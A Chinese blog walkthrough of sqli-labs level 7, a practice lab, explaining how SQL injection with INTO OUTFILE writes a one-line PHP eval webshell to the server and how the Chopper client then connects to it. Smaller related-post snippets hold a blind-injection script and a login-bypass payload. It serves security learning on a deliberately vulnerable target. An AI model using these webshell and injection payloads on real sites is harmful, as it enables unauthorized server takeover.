sqli-labs关卡7(结合文件上传漏洞+一句马+菜刀)通关思路

已于 2024-05-23 18:24:27 修改
阅读量1.4k 收藏 14
点赞数 7
分类专栏: # sqli-labs靶场7-10关 sqli-labs靶场 文章标签: web安全 sql
于 2023-10-28 18:32:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134093457
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、靶场第七关要了解的相关知识点

  • 1.文件上传漏洞是什么?
  • 2.一句话木马
  • 3.mysql注入点,用工具对目标站写入一句话,需要哪些条件?
  • 4.此关卡要了解的函数
  • 5.此关要配置的环境

1.文件上传漏洞是什么?

指程序员在编写文件上传的代码中,没有严格的过滤与控制,让恶意用户可以越权上传恶意脚本文件webshell(比如php,asp的一句话木马),实施未经允许的非法操作。

2.一句话木马

一句话木马是黑客比较喜欢用的webshell,因为它简单且功能强大,可以进行好多的操作。
例如

<?php eval(@$_POST['a']); ?>

这个是PHP的一句话木马,其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

3.mysql注入点,用工具对目标站写入一句话,需要哪些条件?

  1. root权限
  2. 网站绝对路径

4.此关卡要了解的函数

  1. into dumpfile()
  2. into outfile()
  3. load_file()
  4. 详细的函数解释可以去这个网站看,挺详细的https://www.cnblogs.com/7-58/p/14101610.html

5.此关要配置的环境

因为此关用到的函数是有限制的,能否成功执行受到参数 secure_file_priv 的影响。我们要在mysql.ini配置文件中设置这个参数,值为空就行。这样就能成功用相关函数去上传一句话木马了。(配置如图所示)
在这里插入图片描述
在这里插入图片描述
然后重启phpstudy即可。

二、靶场第七关思路

  • 1.判断注入点
  • 2.爆字段个数
  • 3.找绝对路径
  • 4.用into outfile函数写入一句话木马
  • 5.菜刀连接

1.判断注入点

老规矩用and 1=1 和 and 1=2测试,发现页面正常,说明不是数字型。(如图1所示)直接提交id=1'发现页面异常,(如图二所示)再提交id=1"发现页面正常,初步是单引号闭合。提交id=1'--+发现还是报错,那么不是简单的单引号闭合,试一试id=1')--+还是不行,再试试id=1'))--+发现页面正常了(如图三所示)。说明是单引号加两个括号的闭合(源码如图四所示)。
图一
图二
图三
图四

2.爆字段个数

注入语句为

id=1')) order by 1--+

到4报错,说明有三个字段(如图所示)
在这里插入图片描述

3.找绝对路径

(如图所示)由于要得到网站的绝对路径,我这里用靶场第二关来获得绝对路径。@@basedir()是安装MYSQL的安装路径 ,@@datadir()是安装MYSQL的数据文件路径。如果自己知道路径可以直接跳下一步
在这里插入图片描述
所以绝对路径是C:/tools/phpstudy_pro/www/sqli-labs/less-7/

4.用into outfile函数写入一句话木马

注入语句为

union select 1,"<?php eval($_REQUEST[1])?>",3 into outfile "C://tools//phpstudy_pro//www//sqli-labs//less-7//shell.php"--+

意思是把一句话木马shell.php写到服务器绝对路径中。两个//是防转义(如图一所示)
图一
(如图二所示)发现服务器已经上传了我们写的一句话木马
在这里插入图片描述

5.菜刀连接

如图所示,打开菜刀输入我们写入的一句话木马地址和参数,成功进入后门
在这里插入图片描述
在这里插入图片描述

总结

第七关是全新不一样的关卡,用了sql注入和文件上传漏洞的组合拳,
知道了什么是文件上传漏洞和一句话木马。此外这一关还可以用布尔盲注来通关,这是第二种方法。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
专栏目录
Sqli-labs靶场第7关详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2191
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs第七关
学习
08-24 1104
在第五六关卡了好几天,终于走到第七关了,首先查看源代码可以看到,SQL查询语句为SELECT * FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1 于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' )) --+ 接下来,我们发现 union 1,2,3一点用都没有 ...
sqli-labs-----第7关
wyzhxhn的博客
11-09 2249
布尔盲注、一句话木、利用文件写入爆出信息
SQLi LABS Less-7 布尔盲注_sqli靶场第七关使用盲注
最新发布
2401_86951451的博客
09-12 568
?id=1’)) and ascii(substr((database()),1,1)) >1 – a import requestsurl = “http://55aa541ede774f4da9a2d0f63c3f758c.app.mituan.zone/Less-7/”payload_len = “”“?id=1’)) and length( (select group_concat(schema_name) from information_schema.schemata) ) ={n} – a”“
sqlilabs第七关
wh1sper、的博客
04-11 816
sqlilabs第五关前言一、解题二、关于into outfile无法成功的问题 前言 没啥说的,直接开整。 一、解题 我这里直接贴源码,就可以看出啥注入类型 看到源码之后输入?id=1’)) ,显示的页面。 题目也告诉我们outfile,说明他的权限开了。 并且这题的字段,表,数据库都和前面的题一样。 我先随便输入点:?id=1’)) union select 1,2,3 into outfile “D:/phpstudy/WWW/sqli-labs-master/Less-7/1.txt”。 虽然他
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来操纵数据库系统,获取敏感信息,甚至控制整个服务器。"sqli-labs"是一个专为学习和测试SQL注入漏洞而设计的开源平台,尤其适用于PHP7.3及更高...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs基础篇【第七关】详细解析
Lucky小小吴的小屋
01-11 3382
sqli-labs基础篇【第七关】详细解析,环境配置和注入判定
sqli-labs第七关(详讲)
TA不懒,但还没有添加简介
09-11 4528
sqli-labs第七关 第七关根据提示知道要用outfile,于是通过注入判断发现是字符型 开始构造语句 结合前六关的经验首先想到括号) 不对 再加一个括号试试? 对了 那么语句部分可能是 where id=(('$id')) 然后通过order by判断字段个数 先简单的提一下outfile 在MySQL里面使用select … into outfile可以把数据导出到文本文件上 里面有几个参数 secure_file_priv 用来限制导出效果。他有三个属性: null限制不能导出 为空可
Sqli-labs——lesson7
weixin_62281892的博客
06-29 522
lesson7
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1772
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
2020.4.2 sqli-labs--第7关①
DSR446的博客
04-02 771
1.这里科普一下file权限和into outfile这个函数。 数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限。 into outfile命令:select into outfile命令作用将查询结果输出保存到一个文件中 使用的环境: 我们必须知道,服务器上一个可以写入文件的文件夹的完整路径 2.我们正常输入?id=1页面回显如下 3.当我们输入 and 1=2...
从零开始的sqli-labs:第七关
asdushf的博客
12-12 2802
sqli-labs第七关 下面是第七关的内容 文章目录sqli-labs第七关前言判断注入类型文件操作函数sql对文件的操作 前言 这次不太一样,判断出注入类型以后,还要知道几个函数。下面慢慢来 判断注入类型 按照国际惯例先输入id值然后查看注入类型 虽然引发了报错但是并不知道具体是什么样的错误。而且这次使用–+也不行了,也就是说可能存在其他符号。然后用双引号。 会发现双引号没有出现报错。这意味着存在单引号与其他的符号。因为输入的如果单引号包围id的话,双引号会作为一个字符,所以不报错。但是当我
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值